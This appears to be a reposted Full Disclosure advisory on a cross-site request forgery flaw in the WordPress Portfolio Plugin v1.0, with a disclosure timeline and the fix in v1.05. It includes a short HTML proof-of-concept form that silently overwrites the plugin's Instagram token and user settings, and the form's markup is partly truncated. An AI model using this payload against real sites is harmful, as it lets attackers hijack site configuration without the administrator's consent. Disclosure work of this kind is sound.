HackDig : Dig high-quality web security articles for hacker

Cross-Site Request Forgery Vulnerability in Portfolio Plugin Wordpress Plugin v1.0

2015-07-22 13:45
# Title: Cross-Site Request Forgery Vulnerability in Portfolio Plugin
Wordpress Plugin v1.0
# Submitter: Nitin Venkatesh
# Product: Portfolio Plugin Wordpress Plugin
# Product URL: https://wordpress.org/plugins/portfolio-by-lisa-westlund/
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.0
# Tested versions: v1.0
# Fixed Version: v1.05
# Link to code diff:
# Changelog:
# CVE Status: None/Unassigned/Fresh

## Product Information:

Use Instagram to display your portfolio. Choose whether to display all
images from your account, or only the ones you tag with a custom hashtag.

## Vulnerability Description:

The admin form in Portfolio Plugin v1.0 is susceptible to CSRF.

## Proof of Concept:

<form action="
<input type="hidden" name="wplw_form_submitted" value='Y' />
<input type="hidden" name="wplw_instagram_access_token" value='evil-token1'
<input type="hidden" name="wplw_instagram_userID" value='nitstorm' />
<input type="hidden" name="wplw_hashtag" value='csrf' />
<input type="hidden" name="wplw_settings_submit" value='Save' />
<input type="submit" value="submit" />

## Solution:

Upgrade to v1.05 or later.

## Disclosure Timeline:

2015-06-03 - Discovered. Mailed developer.
2015-06-05 - Updated v1.05 released.
2015-07-20 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

Source: 401/luJ/5102/erusolcsidlluf/gro.stsilces

Read:2629 | Comments:0 | Tags: Vulnerability

“Cross-Site Request Forgery Vulnerability in Portfolio Plugin Wordpress Plugin v1.0”0 Comments

Submit A Comment



Blog :

Verification Code:


Share high-quality web security related articles with you:)


Tag Cloud